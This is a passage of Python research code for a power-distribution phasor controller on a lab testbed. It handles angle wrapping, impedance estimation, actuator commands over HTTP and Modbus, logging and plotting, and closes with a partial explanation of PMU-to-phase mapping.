\n\n def initializeActuators(self, mode):\n if mode == 0:\n return\n elif mode == 1 or mode == 2:\n responseInverters = requests.get("http://131.243.41.47:9090/control?P_ctrl=97,Batt_ctrl=0")\n elif mode == 3:\n responseInverters = requests.get("http://131.243.41.47:9090/control?P_ctrl=0,Batt_ctrl=0")\n #responseLoads = requests.get(f"http://131.243.41.118:9090/control?P_ctrl=0")\n #the loads request above is commented out, so only the inverter response can be checked (responseLoads was previously referenced here while undefined, and error() was an undefined helper)\n if responseInverters.status_code != 200:\n raise RuntimeError('Error with actuator initialization, responseInverters.status_code = ' + str(responseInverters.status_code))\n return (responseInverters.status_code, None) #None stands in for the loads response while loads initialization is commented out
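\n\n # --- Illustrative sketch (not part of the original control flow, never called): the sign_base encoding used in modbustoOpal above packs one sign flag per P/Q command into a single integer register, anchored at bit 5. sign_bits is the hypothetical [P1, Q1, P2, Q2, ...] list of 1 (>= 0) / 0 (< 0) flags built by the sign_vec loop.\n @staticmethod\n def _example_pack_sign_bits(sign_bits):\n        #bit 5 holds the first flag, bit 4 the second, etc., matching the 2**5 * sign_vec[0] + 2**4 * sign_vec[1] + ... expressions above\n        return sum(bit << (5 - i) for i, bit in enumerate(sign_bits))\n
\n\n # def statusforSPBC(self, phases, phasor_error_mag_pu, phasor_error_ang, ICDI_sigP, ICDI_sigQ, Pmax_pu, Qmax_pu):\n # status = {}\n # # status's keys should be lists\n # status['phases'] = phases\n # status['phasor_errors'] = {\n # 'V': list(phasor_error_mag_pu.ravel()), #ravel flattens the dimensions\n # 'delta': list(phasor_error_ang.ravel())\n # }\n # status['p_saturated'] = list(ICDI_sigP.ravel())\n # status['q_saturated'] = list(ICDI_sigQ.ravel())\n # status['p_max'] = list(Pmax_pu.ravel())\n # status['q_max'] = list(Qmax_pu.ravel())\n # return(status)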
# def PhasorV_ang_wraparound_1d(self, Vang):\n # # brings angles to less than +/- max_degrees\n # # max_degrees = 300.\n # max_degrees = 180. #this will bring angles to within +/- 180 degrees\n # Vang_wrap = Vang\n # # if abs(Vang) > np.radians(max_degrees):\n # # if Vang > 0:\n # # Vang_wrap = Vang - np.radians(360.)\n # # elif Vang < 0:\n # # Vang_wrap = Vang + np.radians(360.)\n # while abs(Vang_wrap) > np.radians(max_degrees):\n # if Vang_wrap > 0:\n # Vang_wrap = Vang_wrap - np.radians(360.)\n # print(f'SUBTRACTING 2pi radians in PhasorV_ang_wraparound to get {Vang_wrap}')\n # elif Vang_wrap < 0:\n # Vang_wrap = Vang_wrap + np.radians(360.)\n # print(f'ADDING 2pi radians in PhasorV_ang_wraparound to get {Vang_wrap}')\n # return Vang_wrap\n
\n def PhasorV_ang_wraparound(self, Vang, nphases=None, nameVang='(notgiven)'):\n # brings angles to less than +/- max_degrees\n # max_degrees = 300.\n max_degrees = 180. #this will bring angles to within +/- 180 degrees\n Vang_wrap = Vang\n if isinstance(Vang, float):\n while abs(Vang_wrap) > np.radians(max_degrees):\n if Vang_wrap > 0:\n # print(f'Vang_wrap[{phase}] = {Vang_wrap[phase]}')\n Vang_wrap = Vang_wrap - np.radians(360.)\n print(f'SUBTRACTING 2pi radians in PhasorV_ang_wraparound from {Vang} to get {Vang_wrap}')\n elif Vang_wrap < 0:\n # print(f'Vang_wrap[{phase}] = {Vang_wrap[phase]}')\n Vang_wrap = Vang_wrap + np.radians(360.)\n print(f'ADDING 2pi radians in PhasorV_ang_wraparound from {Vang} to get {Vang_wrap}')\n
\n else: #elif isinstance(Vang, np.ndarray):\n nphases = len(Vang)\n for phase in range(nphases):\n # if abs(Vang[phase]) > np.radians(max_degrees):\n # if Vang[phase] > 0:\n # print(f'Vang[{phase}] = {Vang[phase]}')\n # Vang_wrap[phase] = Vang[phase] - np.radians(360.)\n # print(f'SUBTRACTING 2pi radians in PhasorV_ang_wraparound from {nameVang} phase {phase} to get {Vang_wrap[phase]}')\n # elif Vang[phase] < 0:\n # print(f'Vang[{phase}] = {Vang[phase]}')\n # Vang_wrap[phase] = Vang[phase] + np.radians(360.)\n # print(f'ADDING 2pi radians in PhasorV_ang_wraparound from {nameVang} phase {phase} to get {Vang_wrap[phase]}')\n
\n while abs(Vang_wrap[phase]) > np.radians(max_degrees):\n if Vang_wrap[phase] > 0:\n print(f'Vang_wrap[{phase}] = {Vang_wrap[phase]}')\n Vang_wrap[phase] = Vang_wrap[phase] - np.radians(360.)\n print(f'SUBTRACTING 2pi radians in PhasorV_ang_wraparound from {nameVang} phase {phase} to get {Vang_wrap[phase]}')\n elif Vang_wrap[phase] < 0:\n print(f'Vang_wrap[{phase}] = {Vang_wrap[phase]}')\n Vang_wrap[phase] = Vang_wrap[phase] + np.radians(360.)\n print(f'ADDING 2pi radians in PhasorV_ang_wraparound from {nameVang} phase {phase} to get {Vang_wrap[phase]}')\n # else:\n # print('ERROR Vang not list or float')\n return Vang_wrap
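\n\n # --- Illustrative sketch (not part of the original control flow, never called): two wrap-safe angle utilities. _example_wrap_to_pi is a closed-form equivalent of the while-loop wrapping in PhasorV_ang_wraparound above; _example_circular_mean is a wrap-safe way to average angles (plain arithmetic averaging, as used in the phasor calcs above, can bias results for samples straddling the +/-180 degree boundary). Both assume radians and accept scalars or numpy arrays.\n @staticmethod\n def _example_wrap_to_pi(ang):\n        return (ang + np.pi) % (2. * np.pi) - np.pi #maps any angle into [-pi, pi)\n
\n @staticmethod\n def _example_circular_mean(angles_rad):\n        return np.angle(np.mean(np.exp(1j * np.asarray(angles_rad)))) #angle of the mean unit phasor\n
\n def save_actuation_data(self, phases, P_cmd, Q_cmd, P_act, Q_act, P_PV, Batt_cmd, pf_ctrl):\n log_actuation = {}\n\n log_actuation['phases'] = phases\n log_actuation['P_cmd'] = P_cmd.tolist()\n log_actuation['Q_cmd'] = Q_cmd.tolist()\n log_actuation['P_act'] = P_act.tolist()\n log_actuation['Q_act'] = Q_act.tolist()\n log_actuation['P_PV'] = 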
(P_PV/1000).tolist()\n log_actuation['Batt_cmd'] = (Batt_cmd/1000).tolist()\n log_actuation['pf_ctrl'] = pf_ctrl.tolist()\n\n return log_actuation\n\n #step gets called every (rate) seconds starting with init in LPBCProcess within do_trigger/trigger/call_periodic (XBOSProcess) with:\n #status = self.step(local_phasors, reference_phasors, phasor_targets)\n def step(self, local_phasors, reference_phasors, phasor_target): #HERE what happens when no PMU readings are given (Gabe), maybe step wont be called\n '''\n print('REF upmu0: ')\n print(reference_phasors[0][0])\n print(reference_phasors[1][0])\n print(reference_phasors[2][0])\n print('upmu4 voltage: ')\n print('PHASE A: ',local_phasors[0][0])\n print('PHASE B: ',local_phasors[1][0])\n print('PHASE C: ', local_phasors[2][0])\n print('current: ')\n print('PHASE A: ',local_phasors[3][0])\n print('PHASE B: ',local_phasors[4][0])\n print('PHASE C: ', local_phasors[5][0])\n '''\n\n #Initilizes actuators, makes sure you're getting through to them\n if self.iteration_counter == 0:\n pass\n #HHERE commented out for debugging\n #could call CIL_debug.py (or a function that does what CIL_debug.py does) here to reset the Opal registers\n # (responseInverters, responseLoads) = self.initializeActuators(self.mode) #throws an error if initialization fails\n # return\n\n iterstart = pytime.time()\n self.iteration_counter += 1\n print('iteration counter bus ' + str(self.busId) + ' : ' + str(self.iteration_counter))\n if self.iteration_counter > 1:\n print(f'time since last iteration {iterstart-self.iterstart}')\n self.iterstart = pytime.time()\n\n if True: #relic from lpbcwrapper\n #HEREE\n # if self.usingNonpuZeff and self.ZeffkestinitHasNotBeenInitialized:\n # Zbase = 1000*self.kVbase*self.kVbase/self.network_kVAbase #setup.py uses subkVbase_phg*subkVbase_phg*1000/subkVAbase to calc Zbase, so this is correct\n # print(f'SETTING Zeffkestinit with Zbase ({Zbase}) calculated using network_kVAbase ({self.network_kVAbase}) received from SPBC')\n # Zeffkestinit, self.ZeffkTru = self.estimator.setZeffandZeffkestinitWnewZbase(Zbase, self.Zeffk_init_mult)\n # self.ZeffkestinitHasNotBeenInitialized = 0\n\n if self.useRefNodeforVcalc:\n # calculate relative voltage phasor\n #the correct PMUs for voltage and current (ie uPMUP123 and uPMU123) are linked in the configuration phase, so local_phasors are what you want (already)\n #values are ordered as: A,B,C according to availability, using self.plug_to_phase_map\n if self.AveragePhasorMeasurements:\n (self.Vang_with120degshifts,self.VangRef,self.Vang_without120degshifts,self.Vmag,self.VmagRef,self.Vmag_relative, V_ang_ref_firstPhase, dataWindowLength, Vmeas_all_phases) = self.phasorV_calc(local_phasors, reference_phasors, self.nphases, self.plug_to_V_idx)\n else:\n (self.Vang_with120degshifts,self.VangRef,self.Vang_without120degshifts,self.Vmag,self.VmagRef,self.Vmag_relative, local_time_index, ref_time_index, V_ang_ref_firstPhase, dataWindowLength, Vmeas_all_phases) = self.old_phasorV_calc(local_phasors, reference_phasors, self.nphases, self.plug_to_V_idx)\n deltaVangReliable = Vmeas_all_phases\n\n # if any(np.isnan(self.Vang_without120degshifts)):\n if Vmeas_all_phases == 0:\n # print('Every phase has not received a relative phasor measurement yet, bus ' + str(self.busId))\n print(f'~~~ Didnt receive a measurement for each phase of bus {self.busId}, not running the controller this round. 
~~~')\n return\n #these are used by the LQR controller\n self.Vang_with120degshifts = self.PhasorV_ang_wraparound(self.Vang_with120degshifts, self.nphases, nameVang='self.Vang_with120degshifts')\n self.Vang_without120degshifts = self.PhasorV_ang_wraparound(self.Vang_without120degshifts, self.nphases, nameVang='self.Vang_without120degshifts')\n self.VangRef = self.PhasorV_ang_wraparound(self.VangRef, self.nphases, nameVang='self.VangRef')\n self.Vmag_pu = self.Vmag / (self.localkVbase * 1000) # absolute\n self.Vmag_relative_pu = self.Vmag_relative / (self.localkVbase * 1000) #this and the VmagTarg_relative_pu line divides Vmag_ref by self.localkVbase which may create an issue bc Vref != 1.0pu, but thats okay\n self.VmagRef_pu = self.VmagRef / (self.localkVbase * 1000)\n # self.VangTarg_notRelative = self.VangTarg_relative + self.VangRef\n # self.VmagTarg_pu = self.VmagTarg_relative_pu + self.VmagRef_pu #VmagTarg is given as VmagTarg_relative_pu rn from the SPBC\n print('Vmag_pu bus ' + str(self.busId) + ' : ' + str(self.Vmag_pu))\n print('VmagRef_pu bus ' + str(self.busId) + ' : ' + str(self.VmagRef_pu))\n # print('VmagTarg_pu bus ' + str(self.busId) + ' : ' + str(self.VmagTarg_pu))\n print('Vmag_relative_pu bus ' + str(self.busId) + ' : ' + str(self.Vmag_relative_pu))\n print('Vang_without120degshifts bus ' + str(self.busId) + ' : ' + str(self.Vang_without120degshifts))\n print('VangRef bus ' + str(self.busId) + ' : ' + str(self.VangRef))\n print('Vang_with120degshifts bus ' + str(self.busId) + ' : ' + str(self.Vang_with120degshifts))\n # print('self.VangTarg_relative bus ' + str(self.busId) + ' : ' + str(self.VangTarg_relative))\n # print('self.VangTarg_notRelative bus ' + str(self.busId) + ' : ' + str(self.VangTarg_notRelative))\n #this is here so that Relative angles can be used as LQR inputs (but with a non-relative Vcomp)\n Vcomp_pu = self.Vmag_pu*np.cos(self.Vang_with120degshifts) + self.Vmag_pu*np.sin(self.Vang_with120degshifts)*1j\n Vang = self.Vang_without120degshifts\n\n # if self.currentMeasExists:\n # #here not sure why Vcomp is given\n # Zeffkest, Gt = self.estimator.ZeffUpdateWRef(self.Vmag_pu, self.Vang_with120degshifts, self.P_implemented_PU, self.Q_implemented_PU, V0magArray=self.VmagRef_pu, V0angArray=self.VangRef, sat_arrayP=self.sat_arrayP, sat_arrayQ=self.sat_arrayQ, VcompArray=Vcomp_pu, IcompArray=self.Icomp_pu) #all Vangs must be in radians\n # else:\n Zeffkest, Gt = self.estimator.ZeffUpdate(Vcomp_pu, self.P_implemented_PU, self.Q_implemented_PU, self.sat_arrayP, self.sat_arrayQ)\n # Babbrev = self.estimator.getLinWRef(Zeffkest, Vcomp_pu, self.VmagRef_pu, self.VangRef)\n # # Babbrev = self.estimator.getLinWRef(self, Zeffkest, self.Vmag_pu, self.Vang_with120degshifts, VmagRef_pu, self.VangRef)\n\n else:\n #HEREE\n Vang, self.Vmag, dataWindowLength, deltaVangReliable = self.phasorV_localMeas(local_phasors, self.nphases, self.plug_to_V_idx)\n self.Vang_with120degshifts = self.PhasorV_ang_wraparound(Vang, self.nphases, nameVang='self.Vang_with120degshifts')\n self.Vmag_pu = self.Vmag / (self.localkVbase * 1000) # absolute\n print('Vmag_pu bus ' + str(self.busId) + ' : ' + str(self.Vmag_pu))\n print('Vang_with120degshifts bus ' + str(self.busId) + ' : ' + str(self.Vang_with120degshifts))\n Vcomp_pu = self.Vmag_pu*np.cos(self.Vang_with120degshifts) + self.Vmag_pu*np.sin(self.Vang_with120degshifts)*1j\n\n # if self.currentMeasExists:\n # #here not sure why Vcomp is given\n # Zeffkest, Gt = self.estimator.ZeffUpdateWRef(self.Vmag_pu, self.Vang_with120degshifts, 
self.P_implemented_PU, self.Q_implemented_PU, V0magArray=self.VmagRef_pu, V0angArray=self.VangRef, sat_arrayP=self.sat_arrayP, sat_arrayQ=self.sat_arrayQ, VcompArray=Vcomp_pu, IcompArray=self.Icomp_pu) #all Vangs must be in radians\n # else:\n Zeffkest, Gt = self.estimator.ZeffUpdate(Vcomp_pu, self.P_implemented_PU, self.Q_implemented_PU, self.sat_arrayP, self.sat_arrayQ, deltaVangReliable)\n # deltaVangReliable is given to ZeffUpdate so that ZeffUpdate can update VompPrev and IcompPrev even if Zeff isnt updated\n\n # Babbrev = self.estimator.getLinWoRef(Zeffkest)\n\n # #OLD VERSION: This wouldnt work as is--see note in commented out phasorV_localMeas description\n # #also, would need to initialize self.Vang_fict in the first round\n # deltaVang_compensated, deltaVang_uncompensated, self.Vmag, dataWindowLength, Vmeas_all_phases = self.phasorV_localMeas(local_phasors, self.nphases, self.plug_to_V_idx)\n #\n # if Vmeas_all_phases == 0:\n # # print('Every phase has not received a relative phasor measurement yet, bus ' + str(self.busId))\n # print(f'~~~ Didnt receive a measurement for each phase of bus {self.busId}, not running the controller this round. ~~~')\n # return\n #\n # self.Vmag_pu = self.Vmag / (self.localkVbase * 1000)\n # #this Vcomp uses the unaltered 60 Hz synchrophasor reference\n # self.Vang_fict = self.Vang_fict + deltaVang_compensated\n # self.Vang_fict = self.PhasorV_ang_wraparound(self.Vang_fict, self.nphases, nameVang='self.Vang_fict')\n # Vcomp_fict_pu = self.Vmag_pu*np.cos(self.Vang_fict) + self.Vmag_pu*np.sin(self.Vang_fict)*1j\n # Vang = self.Vang_fict\n #\n # if self.estimatorInitialized == 0:\n # Zeffkest = self.ZeffkTru*self.Zeffk_init_mult\n # Gt = self.estimator.Gt\n # self.estimatorInitialized = 1\n # else:\n # # if self.currentMeasExists:\n # # #here not sure why Vcomp is given\n # # Zeffkest, Gt = self.estimator.ZeffUpdateWoRef(self.Vmag_pu, self.Vang_with120degshifts, self.P_implemented_PU, self.Q_implemented_PU, self.freq, self.sat_arrayP, self.sat_arrayQ, Vcomp_pu, IcompArray=self.Icomp_pu) #all Vangs must be in radians\n # # else:\n # Zeffkest, Gt = self.estimator.ZeffUpdate(Vcomp_fict_pu, self.P_implemented_PU, self.Q_implemented_PU, self.sat_arrayP, self.sat_arrayQ)\n # Babbrev = self.estimator.getLinWoRef(Zeffkest)\n # # Babbrev = self.estimator.getLinWoRef(Zeffkest, self.Vmag_pu, self.P_implemented_PU, self.Q_implemented_PU)\n\n\n\n\n # self.Pcmd_pu = np.zeros(self.nphases)\n # self.Qcmd_pu = np.zeros(self.nphases)\n # self.Pcmd_pu = (np.ones(self.nphases) + np.random.randn(self.nphases)*self.perturbScale) * self.baseP_pu\n # self.Qcmd_pu = (np.ones(self.nphases) + np.random.randn(self.nphases)*self.perturbScale) * self.baseQ_pu\n self.Pcmd_pu = (np.random.randn(self.nphases)*self.perturbScale) * self.baseP_pu\n self.Qcmd_pu = (np.random.randn(self.nphases)*self.perturbScale) * self.baseQ_pu\n # if self.perturbPowerCommand: #used to create signal for Z estimation\n # self.Pcmd_pu = self.Pcmd_pu + np.random.randn(self.nphases) * self.perturbScale\n # self.Qcmd_pu = self.Qcmd_pu + np.random.randn(self.nphases) * self.perturbScale\n\n print('Pcmd_pu bus ' + str(self.busId) + ' : ' + str(self.Pcmd_pu))\n print('Qcmd_pu bus ' + str(self.busId) + ' : ' + str(self.Qcmd_pu))\n print('localkVAbase bus ' + str(self.busId) + ' : ' + str(self.localkVAbase))\n\n print('Zeffkest bus ' + str(self.busId) + ' : ' + str(Zeffkest))\n print('ZeffkestErr bus ' + str(self.busId) + ' : ' + str(np.linalg.norm(Zeffkest-self.ZeffkTru)))\n print('GtMag ' + str(self.busId) + ' : 
' + str(np.linalg.norm(Gt)))\n\n # The controller is entirely in PU. So if the pu P and Q commands are ultimately enacted on the network\n #according to the network-wide kVAbase (that was used to calculate the Zbase that was used to build the controller), then there shouldn’t be any problems.\n # The Sratio multiplication should not mess up the I estimation from S command (for Z estimation) bc the Sratio multiplication is canceled out when the Base is divided by the Sratio.\n #(Zest should use self.network_kVAbase not self.localkVAbase)\n\n # self.localkVAbase = self.network_kVAbase/self.localSratio, so this assumes that the power injections will later get multiplied by self.localSratio\n self.Pcmd_kVA = self.Pcmd_pu * self.localkVAbase #these are positive for power injections, not extractions\n self.Qcmd_kVA = self.Qcmd_pu * self.localkVAbase #localkVAbase takes into account that network_kVAbase is scaled down by localSratio (divides by localSratio)\n #localkVAbase is not a good name (bc its not the same thing as how voltage bases change throughout a network)\n #instead localkVAbase should be called flexlabAdjustedkVAbase #HHERE\n\n if self.actType == 'inverter':\n if self.currentMeasExists or self.mode == 3 or self.mode == 4 or True: #HHHERE put in the or True when I set the self.currentMeasExists to 0 manually\n '''\n COMMENTED OUT FOR CIL TESTING\n # self.commandReceipt, self.P_implemented_PU, self.Q_implemented_PU = self.httptoInverters(self.nphases, self.act_idxs, self.Pcmd_kVA, self.Qcmd_kVA, self.Pact) #calculating Pact requires an active current measurement\n self.commandReceipt = self.httptoInverters(self.nphases, self.act_idxs, self.Pcmd_kVA, self.Qcmd_kVA, self.Pact) #calculating Pact requires an active current measurement\n self.P_implemented_PU = self.Pcmd_pu #HERE change these if inverter commands are not always realized\n self.Q_implemented_PU = self.Qcmd_pu\n print('inverter command receipt bus ' + str(self.busId) + ' : ' + str(self.commandReceipt))\n '''\n print('********')\n # print('Vmag_relative_pu bus ' + str(self.busId) + ' : ' + str(self.Vmag_relative_pu))\n print('Vmag_pu bus ' + str(self.busId) + ' : ' + str(self.Vmag_pu))\n print('Vang bus ' + str(self.busId) + ' : ' + str(self.Vang_with120degshifts))\n print('self.phasor_error_mag_pu ' + str(self.phasor_error_mag_pu))\n print('self.phasor_error_ang ' + str(self.phasor_error_ang))\n # result, self.P_implemented_PU, self.Q_implemented_PU = self.modbustoOpal(self.nphases, self.Pcmd_kVA, self.Qcmd_kVA, self.ORT_max_VA,self.localSratio, self.client)\n #hardcoded for CIL HERE\n result = self.modbustoOpal(self.nphases, self.Pcmd_kVA, self.Qcmd_kVA, self.ORT_max_VA,self.localSratio, self.client)\n max_PU_power = self.ORT_max_VA/1000/self.network_kVAbase\n print('Opal command receipt bus ' + str(self.busId) + ' : ' + str(result))\n else:\n print('couldnt send commands because no current measurement available') #HERE what?\n elif self.actType == 'load':\n # self.commandReceipt, self.P_implemented_PU, self.Q_implemented_PU = self.httptoLoads(self.nphases, self.act_idxs, self.Pcmd_kVA, self.Qcmd_kVA)\n self.commandReceipt = self.httptoLoads(self.nphases, self.act_idxs, self.Pcmd_kVA, self.Qcmd_kVA)\n # self.P_implemented_PU = self.Pcmd_pu #HERE change these if load commands are not always realized\n # self.Q_implemented_PU = self.Qcmd_pu\n print('load command receipt bus ' + str(self.busId) + ' : ' + str(self.commandReceipt))\n elif self.actType == 'modbus':\n # result, self.P_implemented_PU, self.Q_implemented_PU = 
self.modbustoOpal(self.nphases, self.Pcmd_kVA, self.Qcmd_kVA, self.ORT_max_VA, self.localSratio)\n result = self.modbustoOpal(self.nphases, self.Pcmd_kVA, self.Qcmd_kVA, self.ORT_max_VA, self.localSratio)\n max_PU_power = self.ORT_max_VA/1000/self.network_kVAbase\n print('Opal command receipt bus ' + str(self.busId) + ' : ' + str(result))\n else:\n error('actType error')\n\n #Hack to get self.P_implemented_PU and self.Q_implemented_PU (assumes max_kVA is implemented correctly by self.modbustoOpal, self.httptoLoads or self.httptoInverters + self.modbustoOpal_quadrant combo)\n used_Pcmd_pu = np.zeros(self.nphases)\n used_Qcmd_pu = np.zeros(self.nphases)\n for i in np.arange(nphases):\n if self.Pcmd_pu[i] > max_PU_power[i]: # P and Q commands get compared with max_kVA indepenedently\n used_Pcmd_pu[i] = max_PU_power[i]\n elif self.Pcmd_pu[i] < -max_PU_power[i]:\n used_Pcmd_pu[i] = -max_PU_power[i]\n else:\n used_Pcmd_pu[i] = self.Pcmd_pu[i]\n if self.Qcmd_pu[i] > max_PU_power[i]: # P and Q commands get compared with max_kVA indepenedently\n used_Qcmd_pu[i] = max_PU_power[i]\n elif self.Qcmd_pu[i] < -max_PU_power[i]:\n used_Qcmd_pu[i] = -max_PU_power[i]\n else:\n used_Qcmd_pu[i] = self.Qcmd_pu[i]\n self.P_implemented_PU = used_Pcmd_pu\n self.Q_implemented_PU = used_Qcmd_pu\n print('self.P_implemented_PU ', self.P_implemented_PU)\n print('self.Q_implemented_PU ', self.Q_implemented_PU)\n #HERE self.P_implemented_PU could be self.Pact_PU, but self.Pact_PU requires a PMU current meas, so have to use an if statement to set self.P_implemented_PU with P_act\n #(could get rid of self.P_implemented_PU and just keep self.Pact_PU)\n\n self.Pact_kVA = self.Pact\n self.Qact_kVA = self.Qact\n\n #HHERE need to adjust these so that they log self.P_implemented_PU and self.Q_implemented_PU too\n log_actuation = self.save_actuation_data(self.status_phases, self.Pcmd_kVA, self.Qcmd_kVA, self.Pact_kVA, self.Qact_kVA, self.P_PV, self.batt_cmd, self.pf_ctrl)\n self.log_actuation(log_actuation)\n # print(log_actuation)\n # status = self.statusforSPBC(self.status_phases, self.phasor_error_mag_pu, self.phasor_error_ang, self.ICDI_sigP, self.ICDI_sigQ, self.Pmax_pu, self.Qmax_pu)\n # print(status)\n iterend = pytime.time()\n\n print(f'~~~ STEP FINISH - iter length: {iterend-iterstart}, epoch: {pytime.time()} ~~~')\n print('')\n if (iterend-iterstart) > rate:\n print('WARNING: LOOP LENGTH LARGER THAN RATE - INCREASE SIZE OF RATE')\n print('')\n\n #record data and save plots\n # iter = self.iteration_counter - 1\n iter = self.controlStepsTaken_counter\n # if controlStepTaken == 1:\n # if True:\n if deltaVangReliable:\n self.controlStepsTaken_counter += 1\n print('self.controlStepsTaken_counter ', self.controlStepsTaken_counter)\n if iter < self.HistLength:\n self.ZeffkErrorHist[iter] = np.linalg.norm(Zeffkest-self.ZeffkTru) #frob norm is default\n self.GtMagHist[iter] = np.linalg.norm(Gt)\n self.VmagHist[:,iter] = self.Vmag_pu\n self.VangHist[:,iter] = self.Vang_without120degshifts\n print('SAVING measurements for plotting')\n if iter == np.ceil(self.HistLength/2):\n self.Zeffkintermed = Zeffkest\n elif iter == self.HistLength:\n print('$$$$$$$$$$$$$$$$$$$$$$ SAVING plots $$$$$$$$$$$$$$$$$$$$$$')\n if self.saveVmagandangPlot or self.saveZesterrorPlot:\n current_directory = os.getcwd()\n resultsPATH = os.path.join(current_directory, 'simulationPlots')\n resultsPATH = os.path.join(resultsPATH, f'feeder:{self.testcase}_bus:{self.busId}') #if you want to write over previous run\n # resultsPATH = os.path.join(resultsPATH, 
f'feeder:{self.testcase}_bus:{self.busId}_time:{pytime.time()}') #if you want to save each run\n if not os.path.exists(resultsPATH):\n os.makedirs(resultsPATH)\n\n if self.saveVmagandangPlot:\n #magnitude\n for phase in np.arange(self.estimator.nphases):\n plt.plot(self.VmagHist[phase,:], label='node: ' + self.busId + ', ph: ' + str(phase))\n # print('phase ', phase)\n # plt.title('Network: 13 node feeder with constant load')\n plt.ylabel('p.u. Vmag')\n plt.xlabel('Timestep')\n plt.legend()\n plt.savefig(os.path.join(resultsPATH, 'Vmag')); plt.clf(); plt.cla(); plt.close()\n\n #angle\n for phase in np.arange(self.estimator.nphases):\n Vangs = self.VangHist[phase,:]\n plt.plot(Vangs, label='node: ' + self.busId + ', ph: ' + str(phase))\n # plt.title('Network: 13 node feeder with constant load')\n plt.ylabel('Vang [rad]')\n plt.xlabel('Timestep')\n plt.legend()\n plt.savefig(os.path.join(resultsPATH, 'Vang')); plt.clf(); plt.cla(); plt.close()\n print('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')\n print('SAVED Vmag and Vang plots ')\n\n if self.saveZesterrorPlot:\n print('<<<<<<<<<<<<<<<<<<<<<<<<<<,')\n print('self.initErrString ', self.initErrString)\n print(f'Zeffk_true (PU) bus {self.busId}: ', self.ZeffkTru)\n print(f'Zeffk_init (PU) bus {self.busId}: ', self.Zeff_kinit)\n print(f'Zeffk_intermed (PU) bus {self.busId}: ', self.Zeffkintermed)\n print(f'Zeffk_est (PU) bus {self.busId}: ', Zeffkest)\n Zeststack = np.vstack((self.Zeff_kinit, self.Zeffkintermed, Zeffkest))\n Zest_df = pd.DataFrame(Zeststack)\n Zest_df.to_csv(os.path.join(resultsPATH, f'Zestimates_{self.initErrString}.csv'))\n\n plt.plot(self.ZeffkErrorHist,'-', label='node: ' + self.busId)\n # plt.title('Zeff Estimation Error')\n plt.ylabel('Frobenius Norm Zeff Estimation Error')\n plt.xlabel('Timestep')\n plt.legend()\n plt.savefig(os.path.join(resultsPATH, f'ZestError_{self.initErrString}.png')); plt.clf(); plt.cla(); plt.close()\n\n plt.plot(self.GtMagHist,'-', label='node: ' + self.busId)\n plt.ylabel('Frobenius Norm of Gt')\n plt.xlabel('Timestep')\n plt.legend()\n plt.savefig(os.path.join(resultsPATH, f'Gt_{self.initErrString}.png')); plt.clf(); plt.cla(); plt.close()\n\n stack = np.vstack((self.ZeffkErrorHist,self.GtMagHist))\n if self.saveVmagandangPlot:\n for phase in np.arange(self.estimator.nphases):\n stack = np.vstack((stack,self.VmagHist[phase,:]))\n if self.estimator.nphases == 3:\n Zerr_df = pd.DataFrame(stack.T, columns=['Zth Estimation Error', 'Gt', 'Va Magnitude', 'Vb Magnitude', 'Vc Magnitude'])\n elif self.estimator.nphases == 2:\n Zerr_df = pd.DataFrame(stack.T, columns=['Zth Estimation Error', 'Gt', 'Va Magnitude', 'Vb Magnitude'])\n else:\n Zerr_df = pd.DataFrame(stack.T, columns=['Zth Estimation Error', 'Gt', 'Va Magnitude'])\n # this assumes the phases are a then b then c, which isnt necessarily true\n else:\n Zerr_df = pd.DataFrame(stack.T, columns=['Zth Estimation Error', 'Gt'])\n Zerr_df.to_csv(os.path.join(resultsPATH, f'ZestData_{self.initErrString}.csv'))\n print('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')\n print('SAVED Zest plots ')\n\n # if self.loop != 'None':\n # self.loop.stop() #this should stop the xbosprocess\n # self.loop.stop()\n # self.loop.close()\n # print('running sys.exit(0)')\n # sys.exit(0)\n print('running os._exit(0)')\n os._exit(0)\n return #status\n\n\n'''\nNetwork phase, actuator, and pmu plug mapping explanation:\n\nTLDR:\nActuator assignments are determined by acts_to_phase_dict[key] for each simulation.\nThe entry in 
acts_to_phase_dict[key] (ie 0, 1 or 2) determines which actuator is controlled.\nThe phase entry determines which phase, and must (should) coincide with the phases of that node on the simulated network.\nPhases must be in order (because I haven't implemented a phase to idx mapping yet).\nThe PMU port to actuator mapping is set once for the Flexlab, and applies to all simulations.\nThe PMU port to actuator mapping is used with the given simulation's act to phase mapping to create a port to phase mapping for that simulation (automatically).\nThat port to phase mapping is sent to LPBC, and is used to order the PMU measurements according to their true phase.\n\nAssumptions:\n-Actuators are dispatched in A,B,C order (to ditch this assumption, we would need a phase_to_act map, that might have to come later anyway)\n-voltage and current ports of the PMU are attached in the same order\n-PMU123 and PMU123P are connected in the same order (because in real applications you will not have a PMU123P)\n\n\nLonger Explanation:\nWe want the LPBC wrapper to need minimal changes when it is implemented outside of the Flexlab.\nIn practice, the LPBC is attached to nphases actuators, and has nphases measurements.\nThe LPBC needs to know which phase is which to compare local phasor measurements with reference phasor measurements (it is assumed that reference phasors come in A,B,C order), and also so the LPBC can maintain phase-specific commands from the SPBC.\nSo the LPBC needs the channel to phase mapping.\nIn practice, the LPBC measurements may not go through the WAVE comms network, and the mapping would be plug to phase.\nFor the Flexlab testing, we assume the plugs to channels are a 1-to-1 mapping.\n\nIn the Flexlab, there might be a mismatch between the PMU plugs (wave channels) and the actuators.\nWhat we really want is a mapping between the PMU plugs (wave channels) and the correct phases.\nThe plug to act mapping has to be determined for the Flexlab, but doesn't change.\nEach simulation gives the act to phase mapping.\nUsing both these mappings, we build the plug to phase mapping.\nAlso, the necessary pmu plugs are put on the network, in the canonical order (L1,L2,L3 etc)\n\nTo preserve the minimal-change-necessary paradigm, it is assumed that PMU123 and PMU123P are connected the same way,\nas well as the voltage and current ports for each PMU.\n\nnon-Flexlab-specific dictionaries:\n\nplug_to_phase_dict:\nnot a Flexlab-specific dictionary (generally useful).\nCreates a dictionary which is keyed by the bus ID, where the entry is an nplugs-long list\nwhich maps the PMU plugs eg. 
